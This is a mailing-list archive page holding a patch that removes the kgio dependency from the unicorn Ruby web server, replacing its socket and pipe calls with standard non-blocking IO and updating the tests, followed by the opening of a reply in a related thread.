@@ -1,7 +1,6 @@
  # -*- encoding: binary -*-
  require 'etc'
  require 'stringio'
-require 'kgio'
  require 'raindrops'
  require 'io/wait'

@@ -113,7 +112,7 @@ def self.log_error(logger, prefix, exc)
    F_SETPIPE_SZ = 1031 if RUBY_PLATFORM =~ /linux/

    def self.pipe # :nodoc:
-    Kgio::Pipe.new.each do |io|
+    IO.pipe.each do |io|
      # shrink pipes to minimize impact on /proc/sys/fs/pipe-user-pages-soft
        # limits.
        if defined?(F_SETPIPE_SZ)
diff --git a/lib/unicorn/http_request.rb b/lib/unicorn/http_request.rb
index e3ad592..7f7324b 100644
--- a/lib/unicorn/http_request.rb
+++ b/lib/unicorn/http_request.rb
@@ -71,14 +71,19 @@ def read(socket)
      #  identify the client for the immediate request to the server;
      #  that client may be a proxy, gateway, or other intermediary
      #  acting on behalf of the actual source client."
-    e['REMOTE_ADDR'] = socket.kgio_addr
+    address = socket.remote_address
+    e['REMOTE_ADDR'] = if address.unix?
+      "127.0.0.1"
+    else
+      address.ip_address
+    end

      # short circuit the common case with small GET requests first
-    socket.kgio_read!(16384, buf)
+    socket.readpartial(16384, buf)
      if parse.nil?
        # Parser is not done, queue up more data to read and continue parsing
        # an Exception thrown from the parser will throw us out of the loop
-      false until add_parse(socket.kgio_read!(16384))
+      false until add_parse(socket.readpartial(16384))
      end

      check_client_connection(socket) if @@check_client_connection
@@ -108,7 +113,7 @@ def hijacked?
      TCPI = Raindrops::TCP_Info.allocate

      def check_client_connection(socket) # :nodoc:
-      if Unicorn::TCPClient === socket
+      if TCPSocket === socket
          # Raindrops::TCP_Info#get!, #state (reads struct tcp_info#tcpi_state)
          raise Errno::EPIPE, "client closed connection".freeze,
                EMPTY_ARRAY if closed_state?(TCPI.get!(socket).state)
@@ -153,7 +158,7 @@ def closed_state?(state) # :nodoc:
      # Not that efficient, but probably still better than doing unnecessary
      # work after a client gives up.
      def check_client_connection(socket) # :nodoc:
-      if Unicorn::TCPClient === socket && @@tcpi_inspect_ok
+      if TCPSocket === socket && @@tcpi_inspect_ok
          opt = socket.getsockopt(Socket::IPPROTO_TCP, Socket::TCP_INFO).inspect
          if opt =~ /\bstate=(\S+)/
            raise Errno::EPIPE, "client closed connection".freeze,
diff --git a/lib/unicorn/http_server.rb b/lib/unicorn/http_server.rb
index 21f2a05..98cd119 100644
--- a/lib/unicorn/http_server.rb
+++ b/lib/unicorn/http_server.rb
@@ -111,7 +111,7 @@ def initialize(app, options = {})
      @worker_data = if worker_data = ENV['UNICORN_WORKER']
        worker_data = worker_data.split(',').map!(&:to_i)
        worker_data[1] = worker_data.slice!(1..2).map do |i|
-        Kgio::Pipe.for_fd(i)
+        IO.for_fd(i)
        end
        worker_data
      end
@@ -240,7 +240,7 @@ def listen(address, opt = {}.merge(listener_opts[address] || {}))
      tries = opt[:tries] || 5
      begin
        io = bind_listen(address, opt)
-      unless Kgio::TCPServer === io || Kgio::UNIXServer === io
+      unless TCPServer === io || UNIXServer === io
          io.autoclose = false
          io = server_cast(io)
        end
@@ -386,12 +386,18 @@ def master_sleep(sec)
    # the Ruby itself and not require a separate malloc (on 32-bit MRI 1.9+).
      # Most reads are only one byte here and uncommon, so it's not worth a
      # persistent buffer, either:
-    @self_pipe[0].kgio_tryread(11)
+    begin
+      @self_pipe[0].read_nonblock(11)
+    rescue Errno::EAGAIN
+    end
    end

    def awaken_master
      return if $$ != @master_pid
-    @self_pipe[1].kgio_trywrite('.') # wakeup master process from select
+    begin
+      @self_pipe[1].write_nonblock('.') # wakeup master process from select
+    rescue Errno::EAGAIN
+    end
    end

    # reaps all unreaped workers
@@ -581,7 +587,10 @@ def handle_error(client, e)
        500
      end
      if code
-      client.kgio_trywrite(err_response(code, @request.response_start_sent))
+      begin
+        client.write_nonblock(err_response(code, @request.response_start_sent))
+      rescue Errno::EAGAIN
+      end
      end
      client.close
    rescue
@@ -733,9 +742,15 @@ def worker_loop(worker)
        reopen = reopen_worker_logs(worker.nr) if reopen
        worker.tick = time_now.to_i
        while sock = ready.shift
-        # Unicorn::Worker#kgio_tryaccept is not like accept(2) at all,
+        # Unicorn::Worker#accept_nonblock is not like accept(2) at all,
          # but that will return false
-        if client = sock.kgio_tryaccept
+        client = begin
+          sock.accept_nonblock
+        rescue Errno::EAGAIN
+          false
+        end
+
+        if client
            process_client(client)
            worker.tick = time_now.to_i
          end
@@ -834,7 +849,7 @@ def redirect_io(io, path)

    def inherit_listeners!
      # inherit sockets from parents, they need to be plain Socket objects
-    # before they become Kgio::UNIXServer or Kgio::TCPServer
+    # before they become UNIXServer or TCPServer
      inherited = ENV['UNICORN_FD'].to_s.split(',')

      # emulate sd_listen_fds() for systemd
@@ -858,7 +873,7 @@ def inherit_listeners!
      LISTENERS.replace(inherited)

      # we start out with generic Socket objects that get cast to either
-    # Kgio::TCPServer or Kgio::UNIXServer objects; but since the Socket
+    # TCPServer or UNIXServer objects; but since the Socket
      # objects share the same OS-level file descriptor as the higher-level
      # *Server objects; we need to prevent Socket objects from being
      # garbage-collected
diff --git a/lib/unicorn/socket_helper.rb b/lib/unicorn/socket_helper.rb
index 8a6f6ee..9d2ba52 100644
--- a/lib/unicorn/socket_helper.rb
+++ b/lib/unicorn/socket_helper.rb
@@ -3,18 +3,6 @@
  require 'socket'

  module Unicorn
-
-  # Instead of using a generic Kgio::Socket for everything,
-  # tag TCP sockets so we can use TCP_INFO under Linux without
-  # incurring extra syscalls for Unix domain sockets.
-  # TODO: remove these when we remove kgio
-  TCPClient = Class.new(Kgio::Socket) # :nodoc:
-  class TCPSrv < Kgio::TCPServer # :nodoc:
-    def kgio_tryaccept # :nodoc:
-      super(TCPClient)
-    end
-  end
-
    module SocketHelper

      # internal interface
@@ -135,7 +123,7 @@ def bind_listen(address = '0.0.0.0:8080', opt = {})
          end
          old_umask = File.umask(opt[:umask] || 0)
          begin
-          Kgio::UNIXServer.new(address)
+          UNIXServer.new(address)
          ensure
            File.umask(old_umask)
          end
@@ -164,7 +152,7 @@ def new_tcp_server(addr, port, opt)
        end
        sock.bind(Socket.pack_sockaddr_in(port, addr))
        sock.autoclose = false
-      TCPSrv.for_fd(sock.fileno)
+      TCPServer.for_fd(sock.fileno)
      end

      # returns rfc2732-style (e.g. "[::1]:666") addresses for IPv6
@@ -201,9 +189,9 @@ def sock_name(sock)
      def server_cast(sock)
        begin
          Socket.unpack_sockaddr_in(sock.getsockname)
-        TCPSrv.for_fd(sock.fileno)
+        TCPServer.for_fd(sock.fileno)
        rescue ArgumentError
-        Kgio::UNIXServer.for_fd(sock.fileno)
+        UNIXServer.for_fd(sock.fileno)
        end
      end

diff --git a/lib/unicorn/stream_input.rb b/lib/unicorn/stream_input.rb
index 41d28a0..3241ff4 100644
--- a/lib/unicorn/stream_input.rb
+++ b/lib/unicorn/stream_input.rb
@@ -1,3 +1,4 @@
+
  # -*- encoding: binary -*-

  # When processing uploads, unicorn may expose a StreamInput object under
@@ -49,7 +50,11 @@ def read(length = nil, rv = '')
          to_read = length - @rbuf.size
          rv.replace(@rbuf.slice!(0, @rbuf.size))
          until to_read == 0 || eof? || (rv.size > 0 && @chunked)
-          @socket.kgio_read(to_read, @buf) or eof!
+          begin
+            @socket.readpartial(to_read, @buf)
+          rescue EOFError
+            eof!
+          end
            filter_body(@rbuf, @buf)
            rv << @rbuf
            to_read -= @rbuf.size
@@ -72,8 +77,7 @@ def read(length = nil, rv = '')
    # Returns nil if called at the end of file.
    # This takes zero arguments for strict Rack::Lint compatibility,
    # unlike IO#gets.
-  def gets
-    sep = $/
+  def gets(sep = $/)
      if sep.nil?
        read_all(rv = '')
        return rv.empty? ? nil : rv
@@ -83,7 +87,7 @@ def gets
      begin
        @rbuf.sub!(re, '') and return $1
        return @rbuf.empty? ? nil : @rbuf.slice!(0, @rbuf.size) if eof?
-      @socket.kgio_read(@@io_chunk_size, @buf) or eof!
+      @socket.readpartial(@@io_chunk_size, @buf) or eof!
        filter_body(once = '', @buf)
        @rbuf << once
      end while true
@@ -107,7 +111,7 @@ def each
    def eof?
      if @parser.body_eof?
        while @chunked && ! @parser.parse
-        once = @socket.kgio_read(@@io_chunk_size) or eof!
+        once = @socket.readpartial(@@io_chunk_size) or eof!
          @buf << once
        end
        @socket = nil
@@ -127,7 +131,7 @@ def read_all(dst)
      dst.replace(@rbuf)
      @socket or return
      until eof?
-      @socket.kgio_read(@@io_chunk_size, @buf) or eof!
+      @socket.readpartial(@@io_chunk_size, @buf) or eof!
        filter_body(@rbuf, @buf)
        dst << @rbuf
      end
diff --git a/lib/unicorn/worker.rb b/lib/unicorn/worker.rb
index 5ddf379..fe741c0 100644
--- a/lib/unicorn/worker.rb
+++ b/lib/unicorn/worker.rb
@@ -63,27 +63,39 @@ def soft_kill(sig) # :nodoc:
        signum = Signal.list[sig.to_s] or
            raise ArgumentError, "BUG: bad signal: #{sig.inspect}"
      end
+
      # writing and reading 4 bytes on a pipe is atomic on all POSIX platforms
      # Do not care in the odd case the buffer is full, here.
-    @master.kgio_trywrite([signum].pack('l'))
+    begin
+      @master.write_nonblock([signum].pack('l'))
+    rescue Errno::EAGAIN
+    end
    rescue Errno::EPIPE
      # worker will be reaped soon
    end

    # this only runs when the Rack app.call is not running
    # act like a listener
-  def kgio_tryaccept # :nodoc:
-    case buf = @to_io.kgio_tryread(4)
-    when String
-      # unpack the buffer and trigger the signal handler
-      signum = buf.unpack('l')
-      fake_sig(signum[0])
-      # keep looping, more signals may be queued
-    when nil # EOF: master died, but we are at a safe place to exit
-      fake_sig(:QUIT)
-    when :wait_readable # keep waiting
-      return false
-    end while true # loop, as multiple signals may be sent
+  def accept_nonblock # :nodoc:
+    loop do
+      buf = begin
+        @to_io.read_nonblock(4)
+      rescue Errno::EAGAIN # keep waiting
+        return false
+      rescue EOFError # master died, but we are at a safe place to exit
+        fake_sig(:QUIT)
+      end
+
+      case buf
+      when String
+        # unpack the buffer and trigger the signal handler
+        signum = buf.unpack('l')
+        fake_sig(signum[0])
+        # keep looping, more signals may be queued
+      else
+        raise TypeError, "Unexpected read_nonblock returns: #{buf.inspect}"
+      end
+    end # loop, as multiple signals may be sent
    end

    # worker objects may be compared to just plain Integers
diff --git a/t/oob_gc.ru b/t/oob_gc.ru
index c253540..43c0f68 100644
--- a/t/oob_gc.ru
+++ b/t/oob_gc.ru
@@ -7,7 +7,7 @@

  # Mock GC.start
  def GC.start
-  ObjectSpace.each_object(Kgio::Socket) do |x|
+  ObjectSpace.each_object(Socket) do |x|
      x.closed? or abort "not closed #{x}"
    end
    $gc_started = true
diff --git a/t/oob_gc_path.ru b/t/oob_gc_path.ru
index af8e3b9..e772261 100644
--- a/t/oob_gc_path.ru
+++ b/t/oob_gc_path.ru
@@ -7,7 +7,7 @@

  # Mock GC.start
  def GC.start
-  ObjectSpace.each_object(Kgio::Socket) do |x|
+  ObjectSpace.each_object(Socket) do |x|
      x.closed? or abort "not closed #{x}"
    end
    $gc_started = true
diff --git a/test/unit/test_request.rb b/test/unit/test_request.rb
index 6cb0268..a951057 100644
--- a/test/unit/test_request.rb
+++ b/test/unit/test_request.rb
@@ -11,11 +11,8 @@
  class RequestTest < Test::Unit::TestCase

    class MockRequest < StringIO
-    alias_method :readpartial, :sysread
-    alias_method :kgio_read!, :sysread
-    alias_method :read_nonblock, :sysread
-    def kgio_addr
-      '127.0.0.1'
+    def remote_address
+      Addrinfo.tcp('127.0.0.1', 55608)
      end
    end

@@ -152,14 +149,7 @@ def test_rack_lint_big_put
      buf = (' ' * bs).freeze
      length = bs * count
      client = Tempfile.new('big_put')
-    def client.kgio_addr; '127.0.0.1'; end
-    def client.kgio_read(*args)
-      readpartial(*args)
-    rescue EOFError
-    end
-    def client.kgio_read!(*args)
-      readpartial(*args)
-    end
+    def client.remote_address; Addrinfo.tcp('127.0.0.1', 55608); end
      client.syswrite(
        "PUT / HTTP/1.1\r\n" \
        "Host: foo\r\n" \
diff --git a/test/unit/test_stream_input.rb b/test/unit/test_stream_input.rb
index 1a07ec3..445b415 100644
--- a/test/unit/test_stream_input.rb
+++ b/test/unit/test_stream_input.rb
@@ -6,16 +6,14 @@

  class TestStreamInput < Test::Unit::TestCase
    def setup
-    @rs = $/
      @env = {}
-    @rd, @wr = Kgio::UNIXSocket.pair
+    @rd, @wr = UNIXSocket.pair
      @rd.sync = @wr.sync = true
      @start_pid = $$
    end

    def teardown
      return if $$ != @start_pid
-    $/ = @rs
      @rd.close rescue nil
      @wr.close rescue nil
      Process.waitall
@@ -54,10 +52,9 @@ def test_gets_multiline
    end

    def test_gets_empty_rs
-    $/ = nil
      r = init_request("a\nb\n\n")
      si = Unicorn::StreamInput.new(@rd, r)
-    assert_equal "a\nb\n\n", si.gets
+    assert_equal "a\nb\n\n", si.gets(nil)
      assert_nil si.gets
    end

diff --git a/test/unit/test_tee_input.rb b/test/unit/test_tee_input.rb
index 4647e66..21b90f1 100644
--- a/test/unit/test_tee_input.rb
+++ b/test/unit/test_tee_input.rb
@@ -12,7 +12,7 @@ class TestTeeInput < Test::Unit::TestCase

    def setup
      @rs = $/
-    @rd, @wr = Kgio::UNIXSocket.pair
+    @rd, @wr = UNIXSocket.pair
      @rd.sync = @wr.sync = true
      @start_pid = $$
    end
diff --git a/unicorn.gemspec b/unicorn.gemspec
index 7bb1154..85183d9 100644
--- a/unicorn.gemspec
+++ b/unicorn.gemspec
@@ -36,7 +36,6 @@
    # won't have descriptive text, only the numeric status.
    s.add_development_dependency(%q<rack>)

-  s.add_dependency(%q<kgio>, '~> 2.6')
    s.add_dependency(%q<raindrops>, '~> 0.7')

    s.add_development_dependency('test-unit', '~> 3.0')
-- 
2.35.1

[-- Attachment #2: 0001-Get-rid-of-Kgio.patch --]
[-- Type: text/plain, Size: 15534 bytes --]

From d0412e7305d7b6b4abc64996119e5722709bb6b0 Mon Sep 17 00:00:00 2001
From: Jean Boussier <jean.boussier@gmail.com>
Date: Fri, 8 Jul 2022 12:58:25 +0200
Subject: [PATCH] Get rid of Kgio

As discussed kgio is no longer absolutely necessary.

We can use Ruby 2+ non blocking IO capabilities instead.
---
 lib/unicorn.rb                 |  3 +--
 lib/unicorn/http_request.rb    | 15 +++++++++-----
 lib/unicorn/http_server.rb     | 33 +++++++++++++++++++++--------
 lib/unicorn/socket_helper.rb   | 20 ++++--------------
 lib/unicorn/stream_input.rb    | 16 ++++++++------
 lib/unicorn/worker.rb          | 38 ++++++++++++++++++++++------------
 t/oob_gc.ru                    |  2 +-
 t/oob_gc_path.ru               |  2 +-
 test/unit/test_request.rb      | 16 +++-----------
 test/unit/test_stream_input.rb |  7 ++-----
 test/unit/test_tee_input.rb    |  2 +-
 unicorn.gemspec                |  1 -
 12 files changed, 82 insertions(+), 73 deletions(-)

diff --git a/lib/unicorn.rb b/lib/unicorn.rb
index 1a50631..170719c 100644
--- a/lib/unicorn.rb
+++ b/lib/unicorn.rb
@@ -1,7 +1,6 @@
 # -*- encoding: binary -*-
 require 'etc'
 require 'stringio'
-require 'kgio'
 require 'raindrops'
 require 'io/wait'
 
@@ -113,7 +112,7 @@ def self.log_error(logger, prefix, exc)
   F_SETPIPE_SZ = 1031 if RUBY_PLATFORM =~ /linux/
 
   def self.pipe # :nodoc:
-    Kgio::Pipe.new.each do |io|
+    IO.pipe.each do |io|
       # shrink pipes to minimize impact on /proc/sys/fs/pipe-user-pages-soft
       # limits.
       if defined?(F_SETPIPE_SZ)
diff --git a/lib/unicorn/http_request.rb b/lib/unicorn/http_request.rb
index e3ad592..7f7324b 100644
--- a/lib/unicorn/http_request.rb
+++ b/lib/unicorn/http_request.rb
@@ -71,14 +71,19 @@ def read(socket)
     #  identify the client for the immediate request to the server;
     #  that client may be a proxy, gateway, or other intermediary
     #  acting on behalf of the actual source client."
-    e['REMOTE_ADDR'] = socket.kgio_addr
+    address = socket.remote_address
+    e['REMOTE_ADDR'] = if address.unix?
+      "127.0.0.1"
+    else
+      address.ip_address
+    end
 
     # short circuit the common case with small GET requests first
-    socket.kgio_read!(16384, buf)
+    socket.readpartial(16384, buf)
     if parse.nil?
       # Parser is not done, queue up more data to read and continue parsing
       # an Exception thrown from the parser will throw us out of the loop
-      false until add_parse(socket.kgio_read!(16384))
+      false until add_parse(socket.readpartial(16384))
     end
 
     check_client_connection(socket) if @@check_client_connection
@@ -108,7 +113,7 @@ def hijacked?
     TCPI = Raindrops::TCP_Info.allocate
 
     def check_client_connection(socket) # :nodoc:
-      if Unicorn::TCPClient === socket
+      if TCPSocket === socket
         # Raindrops::TCP_Info#get!, #state (reads struct tcp_info#tcpi_state)
         raise Errno::EPIPE, "client closed connection".freeze,
               EMPTY_ARRAY if closed_state?(TCPI.get!(socket).state)
@@ -153,7 +158,7 @@ def closed_state?(state) # :nodoc:
     # Not that efficient, but probably still better than doing unnecessary
     # work after a client gives up.
     def check_client_connection(socket) # :nodoc:
-      if Unicorn::TCPClient === socket && @@tcpi_inspect_ok
+      if TCPSocket === socket && @@tcpi_inspect_ok
         opt = socket.getsockopt(Socket::IPPROTO_TCP, Socket::TCP_INFO).inspect
         if opt =~ /\bstate=(\S+)/
           raise Errno::EPIPE, "client closed connection".freeze,
diff --git a/lib/unicorn/http_server.rb b/lib/unicorn/http_server.rb
index 21f2a05..98cd119 100644
--- a/lib/unicorn/http_server.rb
+++ b/lib/unicorn/http_server.rb
@@ -111,7 +111,7 @@ def initialize(app, options = {})
     @worker_data = if worker_data = ENV['UNICORN_WORKER']
       worker_data = worker_data.split(',').map!(&:to_i)
       worker_data[1] = worker_data.slice!(1..2).map do |i|
-        Kgio::Pipe.for_fd(i)
+        IO.for_fd(i)
       end
       worker_data
     end
@@ -240,7 +240,7 @@ def listen(address, opt = {}.merge(listener_opts[address] || {}))
     tries = opt[:tries] || 5
     begin
       io = bind_listen(address, opt)
-      unless Kgio::TCPServer === io || Kgio::UNIXServer === io
+      unless TCPServer === io || UNIXServer === io
         io.autoclose = false
         io = server_cast(io)
       end
@@ -386,12 +386,18 @@ def master_sleep(sec)
     # the Ruby itself and not require a separate malloc (on 32-bit MRI 1.9+).
     # Most reads are only one byte here and uncommon, so it's not worth a
     # persistent buffer, either:
-    @self_pipe[0].kgio_tryread(11)
+    begin
+      @self_pipe[0].read_nonblock(11)
+    rescue Errno::EAGAIN
+    end
   end
 
   def awaken_master
     return if $$ != @master_pid
-    @self_pipe[1].kgio_trywrite('.') # wakeup master process from select
+    begin
+      @self_pipe[1].write_nonblock('.') # wakeup master process from select
+    rescue Errno::EAGAIN
+    end
   end
 
   # reaps all unreaped workers
@@ -581,7 +587,10 @@ def handle_error(client, e)
       500
     end
     if code
-      client.kgio_trywrite(err_response(code, @request.response_start_sent))
+      begin
+        client.write_nonblock(err_response(code, @request.response_start_sent))
+      rescue Errno::EAGAIN
+      end
     end
     client.close
   rescue
@@ -733,9 +742,15 @@ def worker_loop(worker)
       reopen = reopen_worker_logs(worker.nr) if reopen
       worker.tick = time_now.to_i
       while sock = ready.shift
-        # Unicorn::Worker#kgio_tryaccept is not like accept(2) at all,
+        # Unicorn::Worker#accept_nonblock is not like accept(2) at all,
         # but that will return false
-        if client = sock.kgio_tryaccept
+        client = begin
+          sock.accept_nonblock
+        rescue Errno::EAGAIN
+          false
+        end
+
+        if client
           process_client(client)
           worker.tick = time_now.to_i
         end
@@ -834,7 +849,7 @@ def redirect_io(io, path)
 
   def inherit_listeners!
     # inherit sockets from parents, they need to be plain Socket objects
-    # before they become Kgio::UNIXServer or Kgio::TCPServer
+    # before they become UNIXServer or TCPServer
     inherited = ENV['UNICORN_FD'].to_s.split(',')
 
     # emulate sd_listen_fds() for systemd
@@ -858,7 +873,7 @@ def inherit_listeners!
     LISTENERS.replace(inherited)
 
     # we start out with generic Socket objects that get cast to either
-    # Kgio::TCPServer or Kgio::UNIXServer objects; but since the Socket
+    # TCPServer or UNIXServer objects; but since the Socket
     # objects share the same OS-level file descriptor as the higher-level
     # *Server objects; we need to prevent Socket objects from being
     # garbage-collected
diff --git a/lib/unicorn/socket_helper.rb b/lib/unicorn/socket_helper.rb
index 8a6f6ee..9d2ba52 100644
--- a/lib/unicorn/socket_helper.rb
+++ b/lib/unicorn/socket_helper.rb
@@ -3,18 +3,6 @@
 require 'socket'
 
 module Unicorn
-
-  # Instead of using a generic Kgio::Socket for everything,
-  # tag TCP sockets so we can use TCP_INFO under Linux without
-  # incurring extra syscalls for Unix domain sockets.
-  # TODO: remove these when we remove kgio
-  TCPClient = Class.new(Kgio::Socket) # :nodoc:
-  class TCPSrv < Kgio::TCPServer # :nodoc:
-    def kgio_tryaccept # :nodoc:
-      super(TCPClient)
-    end
-  end
-
   module SocketHelper
 
     # internal interface
@@ -135,7 +123,7 @@ def bind_listen(address = '0.0.0.0:8080', opt = {})
         end
         old_umask = File.umask(opt[:umask] || 0)
         begin
-          Kgio::UNIXServer.new(address)
+          UNIXServer.new(address)
         ensure
           File.umask(old_umask)
         end
@@ -164,7 +152,7 @@ def new_tcp_server(addr, port, opt)
       end
       sock.bind(Socket.pack_sockaddr_in(port, addr))
       sock.autoclose = false
-      TCPSrv.for_fd(sock.fileno)
+      TCPServer.for_fd(sock.fileno)
     end
 
     # returns rfc2732-style (e.g. "[::1]:666") addresses for IPv6
@@ -201,9 +189,9 @@ def sock_name(sock)
     def server_cast(sock)
       begin
         Socket.unpack_sockaddr_in(sock.getsockname)
-        TCPSrv.for_fd(sock.fileno)
+        TCPServer.for_fd(sock.fileno)
       rescue ArgumentError
-        Kgio::UNIXServer.for_fd(sock.fileno)
+        UNIXServer.for_fd(sock.fileno)
       end
     end
 
diff --git a/lib/unicorn/stream_input.rb b/lib/unicorn/stream_input.rb
index 41d28a0..3241ff4 100644
--- a/lib/unicorn/stream_input.rb
+++ b/lib/unicorn/stream_input.rb
@@ -1,3 +1,4 @@
+
 # -*- encoding: binary -*-
 
 # When processing uploads, unicorn may expose a StreamInput object under
@@ -49,7 +50,11 @@ def read(length = nil, rv = '')
         to_read = length - @rbuf.size
         rv.replace(@rbuf.slice!(0, @rbuf.size))
         until to_read == 0 || eof? || (rv.size > 0 && @chunked)
-          @socket.kgio_read(to_read, @buf) or eof!
+          begin
+            @socket.readpartial(to_read, @buf)
+          rescue EOFError
+            eof!
+          end
           filter_body(@rbuf, @buf)
           rv << @rbuf
           to_read -= @rbuf.size
@@ -72,8 +77,7 @@ def read(length = nil, rv = '')
   # Returns nil if called at the end of file.
   # This takes zero arguments for strict Rack::Lint compatibility,
   # unlike IO#gets.
-  def gets
-    sep = $/
+  def gets(sep = $/)
     if sep.nil?
       read_all(rv = '')
       return rv.empty? ? nil : rv
@@ -83,7 +87,7 @@ def gets
     begin
       @rbuf.sub!(re, '') and return $1
       return @rbuf.empty? ? nil : @rbuf.slice!(0, @rbuf.size) if eof?
-      @socket.kgio_read(@@io_chunk_size, @buf) or eof!
+      @socket.readpartial(@@io_chunk_size, @buf) or eof!
       filter_body(once = '', @buf)
       @rbuf << once
     end while true
@@ -107,7 +111,7 @@ def each
   def eof?
     if @parser.body_eof?
       while @chunked && ! @parser.parse
-        once = @socket.kgio_read(@@io_chunk_size) or eof!
+        once = @socket.readpartial(@@io_chunk_size) or eof!
         @buf << once
       end
       @socket = nil
@@ -127,7 +131,7 @@ def read_all(dst)
     dst.replace(@rbuf)
     @socket or return
     until eof?
-      @socket.kgio_read(@@io_chunk_size, @buf) or eof!
+      @socket.readpartial(@@io_chunk_size, @buf) or eof!
       filter_body(@rbuf, @buf)
       dst << @rbuf
     end
diff --git a/lib/unicorn/worker.rb b/lib/unicorn/worker.rb
index 5ddf379..fe741c0 100644
--- a/lib/unicorn/worker.rb
+++ b/lib/unicorn/worker.rb
@@ -63,27 +63,39 @@ def soft_kill(sig) # :nodoc:
       signum = Signal.list[sig.to_s] or
           raise ArgumentError, "BUG: bad signal: #{sig.inspect}"
     end
+
     # writing and reading 4 bytes on a pipe is atomic on all POSIX platforms
     # Do not care in the odd case the buffer is full, here.
-    @master.kgio_trywrite([signum].pack('l'))
+    begin
+      @master.write_nonblock([signum].pack('l'))
+    rescue Errno::EAGAIN
+    end
   rescue Errno::EPIPE
     # worker will be reaped soon
   end
 
   # this only runs when the Rack app.call is not running
   # act like a listener
-  def kgio_tryaccept # :nodoc:
-    case buf = @to_io.kgio_tryread(4)
-    when String
-      # unpack the buffer and trigger the signal handler
-      signum = buf.unpack('l')
-      fake_sig(signum[0])
-      # keep looping, more signals may be queued
-    when nil # EOF: master died, but we are at a safe place to exit
-      fake_sig(:QUIT)
-    when :wait_readable # keep waiting
-      return false
-    end while true # loop, as multiple signals may be sent
+  def accept_nonblock # :nodoc:
+    loop do
+      buf = begin
+        @to_io.read_nonblock(4)
+      rescue Errno::EAGAIN # keep waiting
+        return false
+      rescue EOFError # master died, but we are at a safe place to exit
+        fake_sig(:QUIT)
+      end
+
+      case buf
+      when String
+        # unpack the buffer and trigger the signal handler
+        signum = buf.unpack('l')
+        fake_sig(signum[0])
+        # keep looping, more signals may be queued
+      else
+        raise TypeError, "Unexpected read_nonblock returns: #{buf.inspect}"
+      end
+    end # loop, as multiple signals may be sent
   end
 
   # worker objects may be compared to just plain Integers
diff --git a/t/oob_gc.ru b/t/oob_gc.ru
index c253540..43c0f68 100644
--- a/t/oob_gc.ru
+++ b/t/oob_gc.ru
@@ -7,7 +7,7 @@
 
 # Mock GC.start
 def GC.start
-  ObjectSpace.each_object(Kgio::Socket) do |x|
+  ObjectSpace.each_object(Socket) do |x|
     x.closed? or abort "not closed #{x}"
   end
   $gc_started = true
diff --git a/t/oob_gc_path.ru b/t/oob_gc_path.ru
index af8e3b9..e772261 100644
--- a/t/oob_gc_path.ru
+++ b/t/oob_gc_path.ru
@@ -7,7 +7,7 @@
 
 # Mock GC.start
 def GC.start
-  ObjectSpace.each_object(Kgio::Socket) do |x|
+  ObjectSpace.each_object(Socket) do |x|
     x.closed? or abort "not closed #{x}"
   end
   $gc_started = true
diff --git a/test/unit/test_request.rb b/test/unit/test_request.rb
index 6cb0268..a951057 100644
--- a/test/unit/test_request.rb
+++ b/test/unit/test_request.rb
@@ -11,11 +11,8 @@
 class RequestTest < Test::Unit::TestCase
 
   class MockRequest < StringIO
-    alias_method :readpartial, :sysread
-    alias_method :kgio_read!, :sysread
-    alias_method :read_nonblock, :sysread
-    def kgio_addr
-      '127.0.0.1'
+    def remote_address
+      Addrinfo.tcp('127.0.0.1', 55608)
     end
   end
 
@@ -152,14 +149,7 @@ def test_rack_lint_big_put
     buf = (' ' * bs).freeze
     length = bs * count
     client = Tempfile.new('big_put')
-    def client.kgio_addr; '127.0.0.1'; end
-    def client.kgio_read(*args)
-      readpartial(*args)
-    rescue EOFError
-    end
-    def client.kgio_read!(*args)
-      readpartial(*args)
-    end
+    def client.remote_address; Addrinfo.tcp('127.0.0.1', 55608); end
     client.syswrite(
       "PUT / HTTP/1.1\r\n" \
       "Host: foo\r\n" \
diff --git a/test/unit/test_stream_input.rb b/test/unit/test_stream_input.rb
index 1a07ec3..445b415 100644
--- a/test/unit/test_stream_input.rb
+++ b/test/unit/test_stream_input.rb
@@ -6,16 +6,14 @@
 
 class TestStreamInput < Test::Unit::TestCase
   def setup
-    @rs = $/
     @env = {}
-    @rd, @wr = Kgio::UNIXSocket.pair
+    @rd, @wr = UNIXSocket.pair
     @rd.sync = @wr.sync = true
     @start_pid = $$
   end
 
   def teardown
     return if $$ != @start_pid
-    $/ = @rs
     @rd.close rescue nil
     @wr.close rescue nil
     Process.waitall
@@ -54,10 +52,9 @@ def test_gets_multiline
   end
 
   def test_gets_empty_rs
-    $/ = nil
     r = init_request("a\nb\n\n")
     si = Unicorn::StreamInput.new(@rd, r)
-    assert_equal "a\nb\n\n", si.gets
+    assert_equal "a\nb\n\n", si.gets(nil)
     assert_nil si.gets
   end
 
diff --git a/test/unit/test_tee_input.rb b/test/unit/test_tee_input.rb
index 4647e66..21b90f1 100644
--- a/test/unit/test_tee_input.rb
+++ b/test/unit/test_tee_input.rb
@@ -12,7 +12,7 @@ class TestTeeInput < Test::Unit::TestCase
 
   def setup
     @rs = $/
-    @rd, @wr = Kgio::UNIXSocket.pair
+    @rd, @wr = UNIXSocket.pair
     @rd.sync = @wr.sync = true
     @start_pid = $$
   end
diff --git a/unicorn.gemspec b/unicorn.gemspec
index 7bb1154..85183d9 100644
--- a/unicorn.gemspec
+++ b/unicorn.gemspec
@@ -36,7 +36,6 @@
   # won't have descriptive text, only the numeric status.
   s.add_development_dependency(%q<rack>)
 
-  s.add_dependency(%q<kgio>, '~> 2.6')
   s.add_dependency(%q<raindrops>, '~> 0.7')
 
   s.add_development_dependency('test-unit', '~> 3.0')
-- 
2.35.1


^ permalink raw reply related	[relevance 2%]

* Re: [PATCH] Master promotion with SIGURG (CoW optimization)
  @ 2022-07-08  6:22  2%           ` Jean Boussier
  2022-09-21 22:16  0%             ` Eric Wong
  0 siblings, 1 reply; 200+ results
From: Jean Boussier @ 2022-07-08  6:22 UTC (permalink / raw)
  To: Eric Wong; +Cc: unicorn-public

> (fully quoting original message for archival purposes, original
> was sent privately)

Sorry for this. Again our company laptops got locked down recently
and now I'm just struggling with shitty mail clients I don't know how to use.


> I don't think Ruby 2.3+ is even necessary, just yet, nor kgio.
> None of these new code paths should be exception-intensive enough to be
> a performance problem.

True.
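
For what it's worth, the exception-free forms Ruby 2.3+ offers look roughly
like this (just an illustration on my side, not code from the patch):

  # returns data, nil when the call would block, or :eof on EOF,
  # without raising for the would-block case
  def read_chunk(io)
    case buf = io.read_nonblock(16384, exception: false)
    when :wait_readable then nil  # would block; no exception raised
    when nil            then :eof # peer closed the connection
    else buf                      # got data
    end
  end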


> > If anything, the reliable timeout is the number one reason why I still
> > believe unicorn
> > is the superior server out there.
>
